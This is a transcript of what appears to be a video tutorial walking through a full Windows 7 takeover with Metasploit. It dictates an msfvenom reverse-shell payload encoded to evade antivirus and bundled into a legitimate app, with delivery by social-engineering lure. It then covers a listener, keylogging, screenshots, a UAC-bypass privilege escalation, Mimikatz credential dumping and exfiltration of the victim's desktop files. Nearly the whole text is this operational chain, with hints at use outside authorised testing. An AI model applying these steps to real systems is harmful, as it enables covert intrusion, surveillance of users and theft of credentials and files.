Welcome back, guys. Today's video will be the third video of Metasploit framework series. In this video, we're going to be talking about talking about complete Windows takeover, from the exploitation, the privilege escalation, dumping keystrokes, taking screenshots, and lastly, dumping credentials. Okay, so basically, the first thing you need to do, guys, when you want to attack Windows 7 is to plan your attack, is to plan your testing. In my case, I'm supposing that I have generated a payload in the form of executable file. It's just for demonstration purposes, right? When you have a real attack, you're gonna wrap this, as I told you in the last video, we can wrap the executable file within any application like Google Chrome, Firefox, whatever application you think that the test would likely to open. So in my case, I have created an application. I used MSF Venom. The command I used is, I think it's better for me to explain everything from scratch. Okay. So MSF Venom, payload, Windows, Metasploit, reverse TCP, which is non-state payload, right? lhost equal the IP address of your attacking machine, lport 4343, and we use also I'm not going to use Shikata, I'm going to use something called XOR dynamic, which is more powerful. XOR dynamic, and then we put the formula of the file. In case you're going to bind this to an existing app, you can here put -x, path to the file. Let's say user share, Windows, binaries, Chrome, right? And then the output file will be, let's say, exploit.exe, and then you send it. If you launch this command guide, you're going to get this executable file. Now, I'm not going to execute that. I just put the command out there to show you what I did. Now, the next thing, guys, you're going to wrap this and send it to your testing machine, your friend. You're going to make your attack looks like social engineering attack. You're going to, you send an application wrapped in Christmas present, whatsoever you make it. It's not my scope with this video to explain to you how to do that. So basically here, this is the executable file. The next thing we need to do, guys, is to launch our listener before sending the file. So here we use exploit multi-handler, right? You enter, and you end up with this prompt, show options, lhost, lport. Let's set the payload. The payload will need to be the same payload I used when I generated the executable file. So in this case, it will be Windows Metasploit, reverse TCP, and lhost. It's already set to my attacking machine, and the lport is 4343. And the last thing I want to do, guys, is to put exploit and run my listener. What's saying? Okay, so yeah, it's listening. So now, depending on your plot and depending on the kind of message and the appeal you created in your victim, it depends on that whether they will open the file or not. So let's say in our case we succeeded and they opened the file. Our purpose in this video is to explain the things from the technical perspective, not from the psychological perspective. Run. And I have here one Metasploit session has opened. We click enter, we clear the screen, and put sessions. Okay. List the sessions. I have 2 sessions. I don't know why. So one has been closed. So I have now 9 and 10. I don't know, sometimes it just opens sessions on its own. Don't know the reason why. Okay, so it doesn't affect our testing, guys. So sessions, let's go back. Clear. Okay, we have now one session open, which is whose ID is 10. Okay, now the next thing I need to do, guys, is how to interact with the session. So basically, I put sessions, specify the ID, then, and I am in the session right now. Now, the first thing we need to do, guys, is to use help in order to get a sense of what we can do with the system. So basically, during your testing, the first thing you need to do, guys, is to understand what is the system that the target is running. So you can do that. You go up and you find here, we go down, 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 down. No, up. Okay, so you can see here some comments we can use some info. We use info to understand what is the system we are handling, right? Prints information about the post. Sorry. So get, no, I forgot the command actually. Let's go up. Get PID, get SID, get UID, displays. Okay, sysinfo. Let's go down. So the system is Windows 7 6.1 build 7601 Service Pack 1. So it is outdated Windows, and for your information, guys, I received many comments saying that no one is using Windows 7 anymore. This is blatantly wrong. Many workstations, many companies are still relying on Windows 7 for their industrial control systems. So if we are talking about mass scale attacks that affect corporates and banks, many of them are still using Windows 7 with outdated versions, right? So Windows 7 is still used, and basically, guys, the exploit here, if you bind it with a legitimate app and you use the iterations I showed you, the dynamic, and if the Windows 10 that they are running is like it is outdated or it is way backwards in terms of the versions, there is still high chance the exploit or the application will work, all right, bypassing Windows Defender. So when you use the obfuscation techniques, guys, like the Metasploit offers, the exert dynamic with iterations, high number of iterations, and couple that with the fact that the Windows 10 is not up to date, you increase the chances of exploiting the system and getting a shell, right? Now, but guys, in most circumstances, when you do penetration testing for your clients, you don't need tools like Shelter or veil evasion, right? Unless you are testing the effectivity of their antivirus system, you use something called veil evasion, which is like a tool in Linux to evade antivirus detections, right? There are many tools, but we are talking about from penetration testing perspective, right? You don't need more than that. So here we get the system information. Now let's get screenshot. We use screen. Now let's click on that and we'll see what is going on there. So this is how it appears at the moment in Windows 7. So this is a screenshot. Now the next thing we do, guys, is how to dump the keystrokes, how to see what the other party is doing, what they are writing in the internet, what they are typing on the keyboard, how to dump keystrokes. Before dumping keystrokes, guys, we need to migrate our process. That's how it works. So we list the current processes, and whichever process we choose here for migration purposes, it all depends on the active privilege of the shell we have. So let's get UID. So we are the user Mu'tasim here. So which process we choose here, the success of the migration depends on the privilege of this user, because right now we are Mu'tasim here. And if we choose a process that is running under system, the migration will fail. So let's choose something we can migrate to. Let's choose Notepad. We put the ID 26. Hope it succeeds. Okay, the migration has completed. Now the next thing, guys, let's start sniffing around or sniffing for keystrokes. So key scan, start. So starting the keystroke sniffer. Let's go back to Windows and type something on Notepad or here. Let's say Google. Let's say how to lose weight. And let's type, for example, using water. Let's go back. Let's write more. We are assuming the position of the victim right now. They're using the computer without knowing what's happening, right? So let's say this is a document to be sent to the reporter. Okay, let's go back, save. Okay. Now let's dump the keystrokes, key scan, dump. So you see here what I have typed. I typed Google, which is right how to. These are not clear, using water. This is a document to be sent to the reporter. So it appears that we are catching the keystrokes, guys. It is something not uncommon to miss some keystrokes. And then we can stop this when we want. Key scan, stop. So now that's how we dump the keystrokes, migrate the processes, and do whatever necessary. Now let's talk about the real stuff, guys. What about privilege escalation? How to escalate our privileges in Windows 7 or even Windows 10, guys. So basically, there is in Windows in general, whether it is Windows 7, Windows 10, Windows 8, Windows 98, all privilege escalation attempts rely solely on bypassing user access control. That's the most effective technique, guys. So in Metasploit, there is a module for this. You can use exploit, and it works on Windows 7, the creator version, or Windows 10 as well. Sorry, Windows 10. Windows local bypass. It's not appearing. Why? Bypass UAC, and we put injection. Not found, right? Okay, so let's put this into background and search. Type window exploit name bypass. Bypass UAC Windows Store file system. Okay, this one. So this one, guys, works on Windows 10 as well as a privilege escalation technique. Not all versions, I mean the previous versions, like the creator, the default creator. Paste. Let's see if this works on Windows 7. Show options. Now we need to set the session to which this exploit will be applied. Set session 10, right? Okay, right. Now exploit. So it's saying Windows 7 may be vulnerable. UAC is enabled, checking levels, part of administrators group continuing. UAC is set to default, bypassing UAC can bypass the settings. Okay, successfully injected the payload into process 2384. Okay, it worked. Let's wait. What's going to happen? Normally, when this exploit finishes executing, guys, a new session will be opened with administrative privileges. Okay, right now we have session 11 opened. Let's go to session 11, sessions I11, get your ID. Oops, still sessions sorry, L, oh, background, sorry, background. So we have two. The one with elevated privilege is 11. Let's make sure this is correct. Sessions I11 get UID. Still معتصم. Okay, let's try to elevate from Meterpreter. So it worked. All right. So we have elevated our privileges from the regular user to system. Okay, now the next thing, guys, we have elevated our privileges. We can do whatever we want now. Now, in the penetration testing arena, guys, you are interested in dumping the credentials of the current Windows user, right, of all the administrators, and try to crack them offline, testing the security policy of the corporation you have been hired for. So here we can load PowerShell. All right. Now, after loading PowerShell, we can use Mimikatz. So in order to use Mimikatz with Metasploit, we use load kiwi. So now we have Mimikatz. The next step is make sure that the privileges are still on system. All right, now creds sv. All right, this is the credentials of this user. معتصم NTLM hash. I can take it and crack it offline. But if you are doing that outside the pen testing arena, I don't know what you have to do with this. You already have access to the system. All you have to do now is to exfiltrate files from the system. How to exfiltrate files, guys? So use download command from Metapreter. So pwd, where we are right now, Windows System 32, and suppose that your target is storing the sensitive files in the desktop, like most of the corporate employees do, right? They put everything in desktop. So let's go to desktop. Let's copy that, or this. Windows, look at this, cd, users, oop, cd users. Why? What do we have here? Oh, okay, I need to go back a bit, one step back, and okay, cd users, cd, let's see what we have here. Okay, let's go to the current user, listing files. We go to the desktop, and we use download, and we take the path. Let's go back, and we save this to desktop. Sensitive. Okay. Download. We specify the source. Sensitive. And the destination file in our machine. Is that right? So sensitive. Okay. I forgot to escape the. We need to escape the shell actually. So we go back and we put double backslash here. We take one. No. We put one here, one in there, for last one, and the last one. Try now. Okay. So now we got the file, and that's how you exfiltrate files. You know, the end goal of any attack is to exfiltrate files. Once you have access, you elevate your privileges and you exfiltrate the files that you were trying to get before. Okay, guys. Now, there is another method of this. There is an exploit I tested here. Let's open the file. You can download this exploit from let's call it. What was it? Expo database. It works on all Windows versions: XP, Vista, Server, Windows 7, but it doesn't work on Windows 10. Okay. So download this exploit from Expo database and transfer it to the Windows 7, and you can also get privilege escalation from that. But the exploit we used in this example, guys, in this video works on Windows 10 if it is not up to date. If it is not up to date. That's why update your systems and don't get bored and irritated by the long-lasting update screen when you turn off your laptop. All right. Okay, guys, thank you so much.